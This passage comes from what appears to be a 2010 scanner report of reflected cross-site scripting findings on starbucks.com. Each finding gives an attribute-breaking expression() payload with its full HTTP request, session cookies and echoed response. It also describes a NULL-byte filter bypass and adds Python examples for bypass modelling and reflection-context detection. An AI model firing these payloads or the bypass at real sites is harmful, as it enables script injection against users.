This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:19:06 GMT
Connection: close
Content-Length: 48718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/>
...[SNIP]...

3.55. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the blocked characters. Note that the request reproduced below is the plain payload without a %00 byte; the request that exercised the bypass is not shown in this entry.

Remediation detail

NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where a string ends at the first NULL byte: the filter inspects only the bytes before the %00, while the application receives and reflects the full decoded value. Fix the actual vulnerability in the application code, and if appropriate ask the WAF vendor to provide a fix for the NULL byte bypass.
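The bypass rests on a mismatch between two string models. The following Python is an added example, not code from this report or from any WAF product: it models a native-code filter through ctypes' C-string conversion, which stops at the first 0x00 byte exactly as a NUL-terminated string routine would, and contrasts it with the length-delimited view of the same decoded query that the application gets. The payload is the one from this finding; the blocked signatures and the position of the %00 are assumptions for illustration, since the report does not name the characters the application blocks.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Assumed signatures a filter might match on (illustrative; not from the report).
BLOCKED_SIGNATURES = (b"style=", b"expression(")

# Constructed queries: the payload from this finding, and the same payload with a
# URL-encoded NULL byte inserted before the characters a filter would block.
PLAIN = b'd1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1'
BYPASS = b'd1e9e%00"style%3d"x%3aexpression(alert(1))"6d79117ac61=1'


def c_string_view(data: bytes) -> bytes:
    """What a NUL-terminated string routine sees: the bytes before the first 0x00.
    ctypes.c_char_p applies C's char* semantics when .value is read."""
    return ctypes.c_char_p(data).value


def native_filter_blocks(raw_query: bytes) -> bool:
    """Model of a WAF written in native code: percent-decode, then pattern-match
    over a C string. Everything after the NUL is invisible to the match."""
    visible = c_string_view(unquote_to_bytes(raw_query))
    return any(sig in visible for sig in BLOCKED_SIGNATURES)


def length_aware_filter_blocks(raw_query: bytes) -> bool:
    """The corrected filter: match over the full, length-delimited buffer."""
    decoded = unquote_to_bytes(raw_query)
    return any(sig in decoded for sig in BLOCKED_SIGNATURES)


def managed_app_sees(raw_query: bytes) -> bytes:
    """A length-delimited runtime receives the whole decoded value, NUL byte
    included, so the payload after the %00 arrives intact and is reflected."""
    return unquote_to_bytes(raw_query)
```

native_filter_blocks(PLAIN) is true and native_filter_blocks(BYPASS) is false, while managed_app_sees(BYPASS) still ends with the full style/expression() sequence: the filter and the application disagree about where the string ends, which is the whole bypass. length_aware_filter_blocks catches both, which is what to ask the WAF vendor for.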

Request

GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:19 GMT
Connection: close
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/>
...[SNIP]...

3.56. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /menu/nutrition/20-under-200?5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:11 GMT
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/>
...[SNIP]...

3.57. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:40 GMT
Connection: close
Content-Length: 40761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/>
...[SNIP]...

3.58. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f9dd"style="x:expression(alert(1))"d76f2f8f40c in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /responsibility?5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:09:34 GMT
Connection: close
Content-Length: 56936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility?5f9dd"style="x:expression(alert(1))"d76f2f8f40c=1"/>
...[SNIP]...

3.59. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81393"style="x:expression(alert(1))"7591aad8b9b in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /responsibility/community?81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:28:55 GMT
Connection: close
Content-Length: 40289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community?81393"style="x:expression(alert(1))"7591aad8b9b=1"/>
...[SNIP]...

3.60. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/community-service

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c425"style="x:expression(alert(1))"142c5cf33b3 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /responsibility/community/community-service?7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:27:01 GMT
Connection: close
Content-Length: 37371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?7c425"style="x:expression(alert(1))"142c5cf33b3=1"/>
...[SNIP]...

3.61. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85521"style="x:expression(alert(1))"af4db09bc1a in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /responsibility/community/starbucks-foundation?85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:08:18 GMT
Connection: close
Content-Length: 39222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?85521"style="x:expression(alert(1))"af4db09bc1a=1"/>
...[SNIP]...

3.62. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-red

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17939"style%3d"x%3aexpression(alert(1))"3c77ff10018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17939"style="x:expression(alert(1))"3c77ff10018 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /responsibility/community/starbucks-red?17939"style%3d"x%3aexpression(alert(1))"3c77ff10018=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:02:25 GMT
Connection: close
Content-Length: 42231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?17939"style="x:expression(alert(1))"3c77ff10018=1"/>
...[SNIP]...

3.63. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/youth-action

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 40290"style="x:expression(alert(1))"07bc4a8acaf in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /responsibility/community/youth-action?40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:29:53 GMT
Connection: close
Content-Length: 40428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?40290"style="x:expression(alert(1))"07bc4a8acaf=1"/>
...[SNIP]...

3.64. http://www.starbucks.com/search [61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b88b9%20style%3dx%3aexpression(alert(1))%20df8091f7da5 was submitted in the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter. This input was echoed as b88b9 style=x:expression(alert(1)) df8091f7da5 in the application's response.

This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. Because the attribute value is not quoted, the payload needs no quote character at all: a space ends the value and the appended style attribute's CSS expression() is evaluated as script. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, an unquoted attribute value built from unencoded input, is browser-independent and is fixed by quoting the attribute and HTML-attribute-encoding the output.
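The scanner's classification of where the echo lands (a double-quoted attribute in 3.50 through 3.63, 3.65 and 3.66; an unquoted attribute here) decides which probe is meaningful, and a reflection is only a finding when the probe comes back unencoded. The following Python is an added example, not part of the original report or of any scanner: it classifies the context of a reflected marker in an HTML response, builds the matching probe, and confirms that the probe is echoed byte-for-byte. The sample responses are constructed from the og:url lines shown in this report plus an entity-encoded variant a fixed page would return; the function names and the probe table are the example's own.

```python
import re

# Constructed sample responses, cut down to the og:url line this report shows for
# findings 3.50 (double-quoted) and 3.64 (unquoted), plus an encoded (fixed) variant.
SAMPLE_DOUBLE_QUOTED = (
    "<html><head>\n"
    '<meta property="og:url" content="http://www.starbucks.com/menu/drinks'
    '?50acb"style="x:expression(alert(1))"842d349c684=1"/>\n'
    "</head></html>"
)
SAMPLE_UNQUOTED = (
    '<meta property="og:url" content="http://www.starbucks.com/search?keywords=\'&'
    '61fd7"style="x:expression(alert(1))"61073b145fc=1b88b9 style=x:expression(alert(1)) df8091f7da5"/>'
)
SAMPLE_ENCODED = (
    '<meta property="og:url" content="http://www.starbucks.com/menu/drinks'
    '?50acb&quot;style=&quot;x:expression(alert(1))&quot;842d349c684=1"/>'
)

# One probe per attribute context; the random prefix/suffix make the echo unambiguous.
PROBES = {
    "attr-double-quoted": '{p}"style="x:expression(alert(1))"{s}',
    "attr-single-quoted": "{p}'style='x:expression(alert(1))'{s}",
    "attr-unquoted": "{p} style=x:expression(alert(1)) {s}",
}


def reflection_context(body: str, marker: str) -> str:
    """Locate the first echo of `marker` and report where it sits in the markup."""
    i = body.find(marker)
    if i < 0:
        return "not-reflected"
    lt = body.rfind("<", 0, i)
    gt = body.rfind(">", 0, i)
    if lt < 0 or gt > lt:
        return "text"                 # the last tag was closed before the marker
    tag_prefix = body[lt:i]           # from the tag's '<' up to the marker
    quote = None                      # attribute quoting state at the marker
    for ch in tag_prefix:
        if quote is None and ch in "\"'":
            quote = ch
        elif ch == quote:
            quote = None
    if quote == '"':
        return "attr-double-quoted"
    if quote == "'":
        return "attr-single-quoted"
    # No open quote: the marker continues an unquoted value if an '=' leads into it.
    if re.search(r"=\s*[^\s\"'=<>`]*$", tag_prefix):
        return "attr-unquoted"
    return "tag"                      # inside the tag but not in an attribute value


def probe(prefix: str, suffix: str, context: str) -> str:
    """Build the probe the scanner would send for the classified context."""
    return PROBES[context].format(p=prefix, s=suffix)


def confirmed(body: str, probe_value: str) -> bool:
    """Exploitable only if the probe comes back byte-for-byte, i.e. unencoded."""
    return probe_value in body
```

Run against the 3.64 line, the marker b88b9 is classified attr-unquoted because the earlier injected quote already closed the content attribute, which is why the space-delimited probe applies there; against the encoded variant the marker is still found in a double-quoted attribute, but confirmed() is false because the quote came back as &quot;, and that is the distinction between a reflection and a vulnerability.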

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1b88b9%20style%3dx%3aexpression(alert(1))%20df8091f7da5 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:42:36 GMT
Content-Length: 33999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1b88b9 style=x:expression(alert(1)) df8091f7da5"/>
...[SNIP]...

3.65. http://www.starbucks.com/search [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.

